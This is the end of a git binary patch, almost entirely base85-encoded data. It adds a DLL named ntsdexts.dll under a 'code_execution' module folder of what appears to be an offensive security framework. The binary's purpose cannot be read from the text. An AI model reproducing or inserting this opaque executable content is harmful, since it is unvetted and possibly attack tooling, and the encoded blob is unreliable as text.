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 literal 0 HcmV?d00001 diff --git a/data/module_source/code_execution/ntsdexts.dll b/data/module_source/code_execution/ntsdexts.dll new file mode 100644 index 0000000000000000000000000000000000000000..0432623d0a9fa3eb1f8604e836842afd321214a9 GIT binary patch literal 85448 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 